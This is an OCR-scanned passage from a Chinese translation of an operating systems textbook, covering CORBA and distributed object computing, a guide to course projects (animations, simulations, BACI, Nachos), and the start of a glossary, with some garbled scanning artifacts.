性 、 易 维护 和 可 移植 的 好 处 。 面 向 对 象 技术 的 使 用 在 包括 分 布 式 操作 系统 的 分 布 式 软件 领域 中 ， 
给 予 了 相等 或 更 多 的 优点 。 面 向 对 象 技 术 在 分 布 式 软件 的 设计 和 实现 中 的 应 用 是 指 分 布 式 对 象 计 
算 (DOC )。 

DOC 的 动机 是 编写 分 布 式 软件 的 困难 越 来 越 大 : 在 计算 和 网 络 硬件 更 小 、 更 快 且 更 便宜 的 
同时 ， 分 布 式 软件 变 得 越 来 越 大 ， 运 行 速度 越 来 越 慢 ， 开 发 和 维护 也 越 来 越 昂 贵 。[SCHM97] 指 
出 分 布 式 软件 源 于 两 类 复杂 性 的 挑战 : 

© HAM: 固有 复杂 性 源 于 分 布 式 的 基本 问题 。 主要 的 问题 有 监测 和 恢复 网 络 及 主机 故障 ， 

最 小 化 通信 延 时 的 影响 ， 确 定 网 络 中 的 服务 组 件 和 计算 机 负载 的 最 优 分 区 。 另 外 ， 并 发 
程序 中 的 资源 锁定 和 死 锁 仍 是 很 难 解决 的 问题 ， 而 分 布 式 系统 实质 上 就 是 并 发 的 。 

@ 偶然 的 : 偶然 复杂 性 源 于 构造 分 布 式 软件 所 使 用 的 工具 及 技术 的 局 限 性 。 一 个 公共 的 偶 

然 复杂 性 源 于 功能 性 设计 的 广泛 使 用 ， 产生 了 不 可 扩展 和 不 可 重用 的 系统 。 

DOC 方法 有 希望 处 理 这 两 类 复杂 性 。DOC 方法 的 中 心 是 充当 本 地 和 远程 对 象 通信 中 介 的 对 
象 请 求 代理 (ORB)。ORB 消除 了 设计 及 实现 分 布 式 应 用 的 一 些 乏 味 的 、 易 错 的 、 不 可 移植 的 因素 。 
使 用 ORB 必须 补充 一 些 消息 交换 的 规则 和 格式 以 及 应 用 程序 和 面向 对 象 框 架 之 间 的 接口 定义 。 

DOC 市 场 有 三 种 主要 的 竞争 技术 : 对 象 管理 组 织 (OMG) 体 系 结构 ， 称 做 公共 对 象 请 求 代理 
体系 结构 (CORBA ); Java 远程 方法 调用 (RMI) 系统 ; 微软 的 分 布 式 组 件 对 象 模型 (DCOM )。 
CORBA 是 三 者 中 最 先进 最 完善 的 。 业 界 领 头 的 许多 厂商 ， 如 IBM、Sun、Netscape 和 Oracle 都 
支持 CORBA, 而 且 微 软 也 宣布 要 将 仅 在 Windows 下 使 用 的 DCOM 和 CORBA 联系 起 来 。 本 附录 
的 其 余部 分 对 CORBA 作 了 简要 概述 。 


BRB GIRE 521 


表 B.2 定义 了 一 些 CORBA 中 使 用 的 一 些 关 键 术 语 。CORBA 的 主要 特点 如 下 ( 见 图 B.4): 


表 B.2 分 布 式 CORBA 系统 的 关键 概念 
CORBA 概念 定 义 
WARS BARRA MR EMRE. FP MARA TREE EN 


EA 述 客户 能 够 请 求 的 对 象 和 操作 。 客 户 应 用 使 用 对 象 引 用 而 非 对 象 进行 请 求 

异常 包含 说 明 请 求 是 否 成 功 执行 的 信息 

实现 定义 并 包含 和 对 象 操作 相 联系 的 工作 的 一 个 或 多 个 方法 。 一 个 服务 器 可 以 有 
一 个 或 多 个 实现 

接口 描述 对 象 实例 的 行为 ， 如 在 对 象 上 进行 什么 操作 是 有 效 的 

接口 定义 描述 在 某 类 对 象 上 有 效 的 操作 

调用 发 送 请 求 的 过 程 

方法 完成 和 操作 相关 的 工作 的 服务 器 代码 。 方 法 包含 在 实现 里 

对 象 代表 了 一 个 人 人、 地方、 物品 或 是 一 段 代码 。 对 象 可 以 有 在 其 上 执行 的 操作 ， 
如 雇员 对 象 的 晋级 操作 

对 象 实例 某 一 特定 类 型 对 象 的 一 个 实例 

对 象 引 用 一 个 对 象 实例 的 标识 

OMG 接口 定义 语言 (IDL ) 在 CORBA 中 定义 接口 的 定义 语言 

操作 客户 向 服务 器 请 求 执行 一 个 对 象 实例 的 动作 

请 求 客户 和 服务 器 应 用 发 送 的 消息 

服务 器 应 用 包含 对 象 及 其 操作 的 一 个 或 多 个 实现 


@ 客户 : 客户 产生 请 求 ， 通 过 底层 的 ORB 提供 的 多 种 机 制 访问 对 象 服务 。 

@ 对 象 实现 : 这 些 实现 提供 了 分 布 式 系统 下 不 同 客户 端的 请 求 的 服务 。CORBA 体系 结构 的 优 
点 之 一 是 客户 端 和 对 象 实现 可 用 任意 数量 的 编程 语言 编写 ， 能 够 提供 全 部 的 请 求 的 服务 。 

© ORB &: ORB 核 负 责 对 象 间 的 通信 。ORB 发 现 网 络 上 的 对 象 ， 向 对 象 发 送 请 求 ， 激 活 
该 对 象 (如果 处 于 非 活动 状态 )， 向 发 送 方 返 回 任何 消息 。ORB 核 提 供 访问 透明 性 ， 
为 程序 员 不 管 在 调用 本 地 方法 还 是 在 调用 远程 方法 时 ， 都 使 用 带 有 相同 参数 的 相同 的 方 
法 。ORB 核 也 提供 位 置 透明 性 : 程序 员 不 需 指 定 对 象 的 位 置 。 





Z 对 所 有 的 ORB 相同 ORB 表示 对 象 请 求 代理 
特定 于 接口 的 stub 和 框架 IDL 表示 接口 定义 语言 
图 可 以 有 多 个 对 象 适配器 DSI 表示 动态 框架 接口 

™ ORB 内 部 接口 


图 B.4 公共 对 象 请 求 代 理 结构 


© 接口 :对 象 的 接口 指定 了 对 象 所 支持 的 操作 和 类 型 ,定义 了 可 向 对 象 发 出 的 请 求 。CORBA 
接口 类 似 于 C++ 中 的 类 和 Java 中 的 接口 。 与 C++ 的 类 不 同 ，CORBA 接口 指定 了 方法 及 
其 参数 ， 返 回 值 ， 但 未 定义 方法 的 实现 。C++ 同 一 类 的 两 个 对 象 ， 其 方法 实现 是 相同 的 。 
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OMG 接口 定义 语言 ODL): IDL 是 用 来 定义 对 象 的 语言 。 以 下 是 一 个 IDL 接口 的 例子 : 


//OMG IDL 
interface Factory 


Object create(); 


he 
该 定义 指定 了 一 个 支持 create 操作 的 叫做 Factory 的 接口 create 不 带 参数 ， 返 回 Object 类 型 的 
对 象 引 用 。 给 定 一 个 Factory 类 型 的 对 象 的 对 象 引 用 ， 客 户 就 会 调用 它 创造 一 个 新 的 CORBA 对 
Zo DL 是 编程 无 关 的 语言 ， 因 此 ， 客 户 端 不 会 直接 调用 任何 对 象 操作 。 为 此 需要 一 个 从 IDL 
到 客户 端 编程 语言 的 映射 。 服务 器 和 客户 端 也 可 能 是 用 不 同 编程 语言 编写 的 。 使 用 语言 规范 可 以 
处 理 多 种 语言 和 异 构 平台 下 的 不 同情 况 。 因此, IDL 提供 了 平台 无 关 性 ( platform independence )。 


B.5 


语言 绑 定 的 创建 : IDL 编译 器 向 不 同 编程 语言 都 映射 了 一 个 OMG IDL 文件 。 这 些 编程 语 
言 可 以 是 面向 对 象 的 也 可 以 不 是 ， 如 Java、Smalltalk、Ada、C、C++ 和 COBOL., 该 映射 
包括 指定 语言 数据 类 型 的 定义 和 访问 服务 对 象 、IDL 客户 stub 接口 IDL 框架 、 对 象 适 
配器 、 动 态 框架 接口 、 直接 的 ORB 接口 的 过 程 接口 。 通常 客户 端 在 编译 时 知道 对 象 接口 ， 
使 用 客户 端 存根 进行 静态 调用 ; 在 某 些 情况 下 ， 客 户 端 不 知道 对 象 接 口 ， 必 须 进 行动 态 
调用 。 

IDL stub: 根据 客户 应 用 的 行为 来 产生 对 ORB 核 的 调用 。IDL stub 可 以 将 ORB 核心 的 
功能 抽象 成 客户 端 应 用 可 利用 的 直接 RPC (远程 过 程 调用 ) 机 制 。 这 些 stub 结合 ORB, 
使 得 远程 对 象 实现 看 起 来 与 内 部 进程 是 连 在 一 起 的 。 大 多 数 情况 下 ，IDL 编译 器 产生 语 
言 相关 的 接口 库 ， 完 成 客户 与 对 象 实现 之 间 的 接口 。 

IDL 框架 : 提供 调用 指定 服务 器 方法 的 代码 。 静 态 IDL 框架 是 对 客户 端 IDL stub 的 服务 器 
端的 补充 。 包 括 ORB 核 和 对 象 实现 之 间 的 绑 定 ,该 绑 定 完成 客户 和 对 象 实现 之 间 的 连接 。 
动态 调用 : 使 用 动态 调用 接口 (DII )， 客 户 应 用 不 用 编译 时 知道 对 象 接口 就 能 向 任何 对 
象 发 出 调用 请 求 。 通 过 查询 接口 库 或 是 其 他 运行 时 资源 可 以 得 到 接口 的 细节 。DII 允许 
客户 发 送 单程 命令 (没有 回复 )。 

动态 框架 接口 (DSI): 类 似 于 IDLstub 和 IDL 框架 之 间 的 关系 ，DSI 提供 了 对 象 的 动态 
分 派 。 等 价 于 在 服务 器 端的 动态 调用 。 

对 象 适配器 : 对 象 适配器 是 由 CORBA 厂商 提供 的 CORBA 系统 组 件 ， 用 来 处 理 一 般 的 
与 ORB 相关 的 任务 ， 如 激活 对 象 和 激活 实现 。 适配器 处 理 这 些 一 般 任 务 , 将 其 与 服务 器 
端 特 定 实现 和 方法 相连 接 。 


推荐 读物 和 网 站 


[KORS90] 对 面向 对 象 概念 进行 了 很 好 的 介绍 。[STRO88] 对 面向 对 象 程序 设计 进行 了 清晰 的 描述 。 
[SYND93] 中 对 面向 对 象 概念 给 出 了 很 有 意思 的 观点 。[VINO97] 对 CORBA 进行 了 概述 。 
KORS90 Korson, T., and McGregor, J. “Understanding Object-Oriented: A Unifying paradigm.” 


Communications of the ACM, September 1990. 


STRO88 Stroustrup, B. “What is Object-Oriented Programming?” IEEE Software, May 1988. 
SNYD93 Snyder, A. “The Essence of Object: Concepts and Terms.” IEEE Software, Januray 1993. 
VINO97 Vinoski, S. “CORBA: Integrating Diverse Applications Within Distributed Heterogencous 


Environments.” IEEE Communications Magazine, February 1997, 


推荐 网 站 
O 对 象 管理 组 织 :推广 CORBA 及 相关 对 象 技术 的 行业 社团 组 织 。 


附录 C ”编程 和 操作 系统 项 目 


许多 教师 认为 , 要 清楚 理解 操作 系统 概念 ,进行 实现 项 目 或 参与 研究 项 目 是 很 重要 的 。 没有 
TE, 学 生 很 难 掌握 一 些 操作 系统 的 基本 概念 和 组 件 间 的 交互 作用 ; 一 个 例子 是 , 许多 学 生 觉 得 
信号 量 这 个 概念 很 难 掌握 。 参 加 项 目 能 增强 对 本 书 中 介绍 的 概念 的 理解 , 让 学 生 更 好 地 理解 操作 
系统 的 不 同 部 分 是 如 何 结合 在 一 起 的 ,能 激励 学 生 使 其 确信 他 们 不 但 能 够 理解 而 且 能 够 实现 一 个 
操作 系统 的 细节 。 

本 篇 试 着 尽 可 能 地 说 明 操作 系统 内 部 的 概念 , 提供 一 定数 量 的 习题 以 加 深 对 概念 的 理解 。 然 
而 , 许多 教师 希望 补充 项 目的 练习 。 本 附录 在 这 方面 给 予 一 些 指导 意见 , 并 介绍 了 在 教师 帮助 网 
站 上 可 以 利用 的 材料 。 支 持 材 料 包 括 8 类 项 目 和 其 他 留 给 学 生 的 练习 : 

@ 动画 和 动画 项 目 
模拟 项 目 
编程 项 目 
研究 项 目 
阅读 和 报告 作业 
写作 作业 
讨论 话题 
关于 BACI 和 NACHOS 


C.1 动画 和 动画 项 目 


动画 提供 了 一 种 理解 现代 操作 系统 复杂 机 制 的 有 效 工 具 。 如 今 的 学 生 希 望 能 够 在 他 们 的 电脑 
上 可 视 化 各 种 复杂 的 操作 系统 机 制 。 在 第 6 版 中 包含 了 16 个 独立 的 动画 ， 涵 盖 了 调度 、 并 发 控 
制 、 高 速 缓存 一 致 性 和 进程 生命 周期 等 领域 。 表 C.1 按照 章节 的 顺序 列 出 了 这 些 动画 。 在 书本 中 
的 对 应 的 位 置 , 这 些 动画 通过 一 个 图 标 来 标记 , 从 而 学 生 能 够 在 学 习 书 本 时 在 合适 的 点 使 用 这 些 
动画 。 教 师 们 可 以 通过 本 书 的 教师 资源 中 心 (IRC) 获 得 这 些 动画 ， 从 而 可 以 让 学 生 在 线 访问 这 些 
动画 。 

这 些 动画 可 以 以 两 种 方式 来 使 用 。 在 被 动 模式 下 , 学 生 可 以 点 击 动画 来 观看 给 出 的 概念 或 者 
阐释 的 原理 。 由 于 动画 能 够 让 用 户 设置 初始 条 件 , 学 生 也 能 够 以 主动 模式 的 方式 使 用 动画 。 从 而 
这 些 动 画 可 以 作为 学 生 课 程 作业 的 基础 。 教师 的 补充 材料 还 包括 一 系列 的 课程 作业 , 每 个 动 通 对 
应 一 个 作业 。 在 每 一 个 用 例 中 , 学 生 可 以 按 指示 输入 一 系列 的 初始 条 件 , 并 分 析 和 比较 结果 。 这 
些 初始 条 件 是 经 过 挑选 以 使 得 这 些 动画 能 够 更 好 地 阐释 其 隐 含 的 原理 。 

这 些 动画 练习 是 由 来 自 科 罗拉 多 矿业 大 学 (Colorado School of Mines ) 的 Brandon Ardiente 
和 Tina Kovic 开发 的 。 


表 C.1 各 章 的 OS 动画 

第 5 章 一 一 并 发 : 互 斥 和 同步 
信号 量 通过 使 用 信号 量 来 演示 有 和 界 缓冲 区 的 消费 者 /生产 者 问题 
生产 者 -消费 者 演示 了 生产 者 -消费 者 缓冲 区 的 操作 
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〈 续 ) 





第 5 章 一 -并 发 : 互 斥 和 同步 


演示 了 读者 和 写 者 之 间 的 交互 操作 


通过 使 用 消息 来 演示 有 界 缓冲 区 的 消费 者 /生产 者 问题 





Eisenberg-McGuire 算法 演示 了 互 斥 的 一 个 软件 解决 方案 
第 6 章 一 一 井 发 : 死 锁 和 饥饿 

银行 家 算法 演示 了 银行 家 算法 的 操作 

Solaris 读 写 锁 演示 了 Solaris 读 写 锁 的 操作 


第 8 章 一 一 虚拟 内 存 






包括 了 随机 、 先 进 先 出 (FIFO )、 最 近 最 少 使 用 ( LRU )、 最 常用 (MFU) 


页 面 置 
换算 法 等 算法 






时 钟 页 面 置 换算 法 
第 9 章 一 一 单 处 理 器 调度 

包括 了 先 来 先 服务 (FCFS )、 时 间 片 轮转 ( Round Robin )、 最 短 进 程 优先 
(SPN )、 最 短 剩余 时 间 优 先 (SRT) 

第 10 章 一 一 多 处 理 器 和 实时 调度 
比较 了 具有 最 早 截止 时 间 的 先 来 先 服务 ( FCFS ) 和 非 强 制 空 闲 时 间 
(EDUIT ) 算法 
演示 了 最 早 截止 时 间 算 法 
演示 了 该 算法 


处 理 器 调度 算法 







具有 开始 截止 时 间 的 非 周 期 性 算法 










具有 完成 截止 时 间 的 周期 性 算法 
单调 速率 调度 





第 11 章 一 一 1/O 管理 和 磁盘 调度 
包括 了 先 来 先 服务 (FCFS )、 最 短 服 务 时 间 优 先 (SRT)、SCAN、C-SCAN、 





磁盘 调度 算法 LOOK 和 C-LOOK 算法 
RAID 演示 了 从 RAID0 到 RAID4 
附录 A 并 发 主题 
理发 店 问题 演示 了 理发 店 问题 的 操作 
C.2 模拟 


IRC 也 支持 基于 得 克 萨 斯 大 学 圣安东尼奥 分 校 开发 的 模拟 作为 作业 布置 给 学 生 。 表 C.2 列 出 
了 各 章 中 的 模拟 。 所 有 的 模拟 都 是 基于 Java 的 ， 它 们 可 以 作为 本 地 Java 程序 执行 或 者 通过 浏览 
器 在 线 地 执行 。 


表 C.2 各 章 的 OS 的 模拟 

第 5 章 一 一 井 发 : 互 斥 和 同步 
允许 用 户 在 对 一 个 在 单 生 产 者 和 单 消费 者 的 场景 下 的 有 界 缓冲 区 同步 的 问题 
进行 实验 
对 一 个 由 pipe、dup2、close、fork、read、write 和 print 组 成 的 程序 进行 模拟 

第 6 章 一 一 并 发 : 死 锁 和 饥饿 

饥饿 的 哲学 家 模拟 哲学 家 就 餐 问 题 
第 8 章 一 一 虚拟 内 存 
用 于 探究 地 址 转换 的 各 个 方面 。 支 持 1 级 和 2 级 页 表 ， 以 及 一 个 转换 检测 组 






生产 者 -消费 者 





UNIX Fork-pipe 


= "P (TLB) 
第 9 章 一 一 单 处 理 器 调度 
进程 调度 允许 用 户 在 一 系列 进程 上 试验 不 同 的 进程 调度 算法 , 并 比较 不 同 的 统计 数字 ， 


例如 吞吐 量 和 等 待 时 间 
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( & ) 
第 11 章 一 一 MO 管理 和 磁盘 调度 
支持 标准 的 调度 算法 , 例如 FCFS, SSTF, SCAN, LOOK, 、C-SCAN C-LOOK 
以 及 这 些 算法 具有 双 倍 缓冲 区 的 情况 
第 12 章 一 一 文件 管理 
模拟 了 一 个 由 open, close, read, write, fork, wait, pthrea 
d_create, pthread_detach 和 pthread_join 指令 组 成 的 程序 






磁盘 头 调度 









IRC 包括 以 下 内 容 : 

1) 可 用 的 模拟 的 一 个 概要 介绍 。 

2) 如 何 把 它们 导入 到 本 地 环境 。 

3) 具体 的 分 配给 学 生 的 作业 ， 告 诉 他 们 需要 做 什么 以 及 期 望 的 结果 是 什么 。 对 每 一 个 模拟 
要 求 ， 本 节 提 供 了 一 个 或 者 两 个 可 以 布置 给 学 生 的 原创 作业 。 

这 些 模拟 作业 是 由 Adam Critchley ( 得 克 萨 斯 大 学 圣安东尼奥 分 校 ) 开发 的 。 


C.3 编程 项 目 
提供 了 三 个 系列 的 编程 项 目 


C.3.1 教材 中 规定 的 项 目 


两 个 主要 的 编程 项 目 ， 一 个 是 开发 一 个 shell 或 者 是 一 个 命令 行 解释 器 ， 另 一 个 项 目 是 开发 
一 个 书本 中 描述 的 进程 分 发 程序 , 这 两 个 项 目 分 别 对 应 于 第 3 章 和 第 9 章 。IRC 提供 了 更 多 的 有 
关 信 息 和 开发 这 些 程序 的 循序 渐进 的 练习 。 

这 些 项 目 是 由 澳大利亚 的 Griffith 大 学 的 Ian G. Granham 开发 的 。 


C.3.2 ”额外 的 大 型 编程 项 目 


有 一 系列 称 为 机 器 问题 (Machine Problem，MP) 的 编程 作业 是 可 以 获得 的 ， 这 些 作 业 是 基于 
Posix 编程 接口 的 。 这 些 作 业 中 的 第 一 个 是 一 个 C 语言 的 速成 课程 ， 其 目的 是 让 学 生 能 够 很 好 地 
掌握 C 以 完成 后 续 的 作业 。 这 一 系列 项 目 包含 九 个 不 同 难度 的 机 器 问题 。 建 议 可 以 把 一 个 项 目 
布置 给 由 两 名 学 生 组 成 的 小 组 。 

每 一 个 MP 不 仅仅 包含 了 对 问题 的 解释 ， 也 包含 了 一 系列 在 作业 中 需要 使 用 到 的 C 文件 和 
逐步 的 说 明 , 还 包括 关于 每 个 作业 的 一 些 问题 , 学 生 必 须 回 答 这 些 问 题 以 显示 其 对 每 个 项 目的 理 
解 程度 。 这 些 作业 的 范畴 包括 : 

1) 使 用 基本 IO 和 字符 串 操 作 肾 数 创建 一 个 运行 在 Shell 环境 中 的 程序 。 

2) 探究 和 扩展 一 个 简单 的 UNIX shell 解释 器 。 

3 ) 修改 利用 线程 的 错误 代码 。 

4) 使 用 同步 原 语 实现 一 个 多 线程 应 用 。 

5) 编写 一 个 用 户 模式 的 线程 调度 器 。 

6) 使 用 信号 和 计时 器 模拟 一 个 分 时 系统 。 

7 ) 一 个 六 周 的 项 目 ， 创 建 一 个 简单 的 可 运行 的 网 络 文件 系统 。 这 个 项 目 涵盖 了 VO 和 文件 

系统 概念 、 内 存 管理 以 及 网 络 原 语 。 

IRC 提供 了 帮助 教师 如 何在 本 地 服务 器 上 建立 帮助 文件 的 说 明 。 

这 些 项 目 作 业 是 由 伊利 诺 伊 大 学 厄 巴 纳 -香槟 分 校 (UIUC) 计 算 机 科学 系 开 发 的 ， 并 由 Matt 
Sparks ( UIUC ) 进行 调整 以 供 本 书 使 用 。 
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C.3.2 ”小 型 编程 项 目 


教师 也 可 以 给 学 生 布 置 一 系列 在 IRC 中 给 出 的 小 型 编程 项 目 。 这 些 项 目 可 以 让 学 生 在 任意 
的 计算 机 上 和 用 任意 的 编程 语言 来 实现 。 这 些 项 目 是 平台 和 开发 语言 无 关 的 。 

这 些小 项 目 与 大 项 目 相 比 有 一 些 优势 . 大 型 项 目 能 让 学 生体 验 到 更 多 的 成 就 感 , 但 是 能 力 相 
对 较 弱 或 者 缺乏 组 织 技能 的 学 生 可 能 不 容易 完成 。 大 型 项 目 通常 是 由 最 好 的 学 生来 承担 大 部 分 任 
务 的 。 小 型 项 目 具 有 更 高 的 成 功 比 例 , 并 且 因 为 可 以 布置 更 多 的 小 项 目 , 所 以 可 以 让 学 生 涉 及 一 
系列 不 同 的 领域 。 相 应 地 ， 教 师 的 IRC 包含 了 一 系列 小 项 目 ， 每 一 个 应 该 在 一 周 左右 的 时 间 内 
完成 ， 从 而 可 以 让 教师 和 学 生 都 满意 。 这 些 项 目 是 由 沃 尔 切 斯 特 理工 大 学 的 Stephen Taylor 开发 
的 ， 他 已 经 在 十 几 次 教授 操作 系统 课程 的 过 程 中 使 用 并 完善 了 这 些 项 目 。 


C4 研究 项 目 


加 深 对 课程 概念 的 理解 并 教 给 学 生 们 研究 技巧 的 一 个 有 效 方 法 是 分 配给 学 生 一 个 研究 项 目 。 
这 样 的 项 目 可 能 包括 查找 资料 以 及 网 上 搜索 厂商 的 产品 , 研究 实验 室 的 活动 和 标准 化 的 工作 。 项 
目 可 以 分 配给 团队 或 者 小 项 目 分 配给 个 人 。 不管 怎 样 , 最 好 在 一 个 学 期 的 早 些 时 候 便 提出 有 关 项 
目 要 求 的 建议 , 从 而 给 教师 以 时 间 评 估 建 议 书 , 确定 合适 的 题目 和 工作 量 。 发 给 学 生 的 关于 研究 
项 目的 说 明 应 包括 : 建议 书 的 格式 、 最 终 报告 的 格式 、 包 含 中 间 和 最 终 期 限 的 进度 安排 、 可 能 的 
项 目 题目 列表 。 

学 生 可 以 从 列 出 的 题目 中 选择 其 一 , 或 设计 自己 的 同等 项 目 。 教 师 手 册 中 包含 建议 书 和 最 终 
报告 的 参考 格式 ， 以 及 乔治 . 梅 隆 大 学 的 Tan N. Nguyen 教授 设计 的 研究 题目 列表 。 


C.5 阅读 /报告 作业 


另 一 个 也 可 以 加 深 学 生 对 课堂 上 的 概念 的 理解 并 给 予 他 们 研究 经 验 的 好 办 法 是 ,阅读 文献 中 
的 论文 并 进行 分 析 。IRC 站 点 中 包含 了 每 一 章 参考 论文 的 列表 , 并 提供 了 文章 副本 。IRC 站 点 中 
也 包含 了 作业 方面 的 参考 建议 。 


C.6 书面 作业 


书面 作业 能 够 在 类 似 操 作 系 统 机 理 这 样 的 技术 课程 的 学 习 过 程 中 起 到 强 有 力 的 放大 作用 .全 
课程 写作 (Writing Across the Curriculum, WAC ) 运动 ( http://wac.colostate.edu/ ) 的 信徒 报告 了 
大 量 的 关于 书面 作业 能 够 加 强 学 习 的 好 处 。 书 面 作业 能 够 让 学 生 更 为 细致 和 全 面 地 对 关于 特定 题 
目 进行 思考 。 此 外 , 书面 作业 能 够 防止 学 生 试 图 通过 最 少 的 个 人 参与 来 通过 课程 学 习 的 动机 ， 即 
防止 学 生 仅 仅 学 习 一 些 结论 和 解决 问题 的 技巧 而 忽略 了 对 目标 问题 的 深入 理解 。 

教师 的 补充 材料 包括 一 系列 的 按 章 组 织 的 书面 作业 。 教 师 可 以 能 够 发 现 这 是 他 们 教学 方案 中 
重要 的 一 部 分 。 对 于 任何 关于 额外 的 书面 作业 的 反馈 和 建议 ， 我 会 非常 感谢 ! 


C.7 讨论 题目 


一 种 提供 协作 的 体验 的 途径 就 是 讨论 题目 ， 在 教师 的 补充 材料 中 有 一 系列 的 讨论 题目 。 每 
个 讨论 题目 都 是 和 书本 的 内 容 相 关 。 教 师 可 以 准备 好 这 些 题 目 ， 从 而 学 生 可 以 在 课 上 、 在 线 聊 
天 室 或 者 消息 板 上 讨论 特定 的 题目 。 如 果 能 够 有 关于 讨论 题目 的 建议 或 者 相关 的 反馈 ,我 会 非 
常 感谢 ! 
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C.8 BACI 和 Nachos 


除了 IRC 提供 的 支持 外 ， 教 师 也 可 以 尝试 使 用 以 下 两 个 可 以 公开 获得 的 软件 : 
@ Ben-Ari 并 发 解析 器 (BACI): BACI 能 够 模拟 并 发 进程 的 执行 ， 能 够 支持 二 值 信号 量 、 
计数 信号 量 和 管 程 。BACI 有 许多 项 目 作 业 ， 用 于 加 强 学 生 对 并 发 概念 的 理解 。 
@ Nachos: Nachos 是 一 个 适合 于 在 操作 系统 设计 入 门 的 课程 中 进行 项 目 实现 的 模拟 的 操作 
系统 环境 。Nachos 能 够 用 于 加 强 对 概念 的 理解 ， 同 时 也 包含 了 许多 项 目 作 业 。 
本 附录 会 对 这 些 内 容 进 行 简要 的 讨论 。 附 录 H 会 对 BACI 提供 更 为 详细 的 介绍 ， 包 括 如 何 
获得 这 个 系统 和 相关 的 作业 。Nachos 在 它 的 网 站 上 维护 了 很 好 的 文档 , 本 节 将 简要 介绍 这 些 内 容 。 


C.8.1 Nachos 概述 


Nachos 是 一 个 教学 型 的 操作 系统 ， 模 拟 一 个 操作 系统 及 其 下 面 的 硬件 。Nachos 作为 一 个 
UNIX 进程 运行 ， 给 学 生 提供 一 个 可 再 生 的 调试 环境 。 其 目标 是 提供 一 个 项 目 环 境 ， 能 真实 显示 
操作 系统 是 如 何 工作 的 ， 同 时 又 足够 简单 ， 使 得 学 生 能 理解 并 做 重大 的 修改 。 

通过 网 络 可 以 得 到 一 个 免费 的 Nachos 软件 包 ， 它 包括 : 

@ 一 篇 概述 性 的 文章 。 

@ 可 工作 的 操作 系统 的 简单 基本 代码 。 

@ 一 台 一 般 的 个 人 电脑 /工作 站 的 模拟 器 。 

@ 试验 任务 : 这 些 任务 阐明 并 探索 了 现代 操作 系统 的 所 有 领域 ,包括 线程 和 并 发 机 制 、 多 
道 程序 设计 、 系 统 调用 、 虚 拟 内 存 、 软 件 载 人 的 TLB 、 文 件 系 统 、 网 络 协议 、 远 程 过 程 
调用 和 分 布 式 系 统 。 

@ 一 个 C++ 的 初级 读本 (Nachos 是 用 C++ 中 易于 学 习 的 子 集 来 编写 的 ,有 助 于 C 程序 员 学 
习 这 部 分 内 容 )。 

世界 上 很 多 大 学 都 在 使 用 Nachos， 并 且 Nachos 也 已 经 被 移植 到 各 种 各 样 的 系统 上 ， 包 括 
Linux, FreeBSD, NetBSD, DEC MIPS, DEC Alpha, Sun Solaris, SGI IRIX 、HP-UX 、IBM AIX, 
MS-DOS 和 Apple Macintosh。 下 一 步 的 计划 包括 移植 到 斯 坦 福 大 学 的 SimOS 上 ， 它 是 一 个 SGI 
工作 站 的 完全 机 器 模拟 。 

从 Web 站 点 上 可 以 免费 得 到 Nachos ( 从 WilliamStallings.com/OS/OS6e.html 可 链接 到 其 
Web 站 点 ); 教师 通过 发 电子 邮件 到 nachos@cs.berkeley.edu 可 得 到 一 个 答案 集 。 此 外 ， 关 于 
Nachos 还 有 一 个 教师 的 邮件 列表 和 一 个 新 闻 组 ( alt.os.nachos )。 


C.8.2 在 Nachos 和 BACI 之 间 做 出 选择 


如 果 教 师 愿 意 花 时 间 , 可 以 将 这 些 模拟 器 中 的 一 个 移植 到 学 生 使 用 的 本 地 环境 中 , 选择 哪 一 
个 则 取决 于 教师 的 目标 和 个 人 意见 。 若 项 目的 重点 是 在 并 发 性 上 ，, M BACT 是 很 好 的 选择 。 对 于 
学 习 信号 量 、 管 程 和 并 发 程序 设计 的 复杂 和 微妙 之 处 、BACI 提供 了 一 个 极 好 的 环境 。 

如 果 教 师 希 望 学 生 探究 OS 的 各 种 机 制 ， 包括 并 发 程序 设计 、 地 址 空间 和 调度 、 虚 拟 内 存 、 
文件 系统 、 网 络 等 ， 则 可 使 用 Nachos。 


术 语 表 


access method (MAE) ”用 于 查找 (find ) 一 个 文件 、 一 条 或 一 组 记录 的 方法 。 

address space (地 址 空间 ) 计算 机 程序 可 用 的 地 址 范围 。 

address translator 地址 转换 器 ) ”把 虚拟 地 址 转换 为 物理 地 址 的 功能 单元 。 

Application Programming Interface (API， 应 用 程序 编程 接口 ) ”软件 开发 者 所 使 用 的 编程 工 
有 其 的 标准 库 ， 用 于 编写 适合 特定 的 操作 系统 或 图 形 化 用 户 界面 的 应 用 程序 。 

asynchronous operation (RI HRE) 相对 于 一 个 特定 的 事件 ,不 是 有 规律 地 或 可 预期 地 发 后 
的 操作 。 例 如 ， 一 个 错误 诊断 例 程 ， 它 可 能 在 一 个 程序 运行 过 程 中 的 任何 时 候 获 得 控制 权 。 
对 这 个 例 程 的 调用 就 是 异步 操作 。 

base address ( 基 址 ) ”在 计算 机 程序 运行 过 程 中 ， 在 计算 地 址 时 用 来 作为 起 点 的 地 址 。 

batch processing 〈 批 处 理 ) ”一 组 进程 中 的 每 一 个 都 在 下 一 个 进程 开始 之 前 结束 运行 。 

Beowulf ”定义 了 一 类 集群 计算 ， 其 重点 是 使 得 整个 系统 的 单位 性 能 的 价格 最 低 ， 并 且 不 会 影 
响 它 执行 计算 工作 的 能 力 。 大 多 数 Beowulf 系统 是 在 Linux 计算 机 中 实现 的 。 

binary semaphore (STAS) 只 能 取 值 为 0 或 1 的 信号 量 。 二 元 信号 量 一 次 只 允许 一 个 
进程 或 线程 访问 共享 的 临界 资源 。 

block CGR) ”1) 作为 一 个 记录 单元 的 一 组 连续 记录 ， 单 元 间 有 块 间 间 隔 分 离 。2 ) 作为 发 送 单 
元 的 一 组 二 进 制 位 。 

busy waiting〈 忙 等 待 ) 重复 执行 一 段 循 环 代 码 以 等 待 一 个 事件 发 生 。 

cache memory 《高速 缓存 存储 器 〉 比 内 存 小 且 比 内 存 快 的 存储 器 ， 位 于 处 理 器 和 内 存 之 间 。 
高 速 缓存 充当 最 近 使 用 过 的 内 存单 元 的 缓冲 区 。 

Central Processing Unit (CPU， 中 央 处 理 器 ) 计算 机 中 获取 并 执行 指令 的 部 分 。 由 算术 逻辑 
单元 〈Arithmetic and Logic Unit, ALU )、 控 制 单元 (control unit) 和 寄存 器 (register) 组 
成 。 通 常 简称 为 处 理 器 (processor )。 

chained list (链表 ) 表 中 的 数据 项 是 分 散 的 , 但 是 每 一 个 表 项 包含 一 个 标识 符 以 定位 下 一 个 
表 项 。 

client (A) ”通过 向 服务 器 进程 发 送 消 息 来 请 求 服务 的 进程 。 

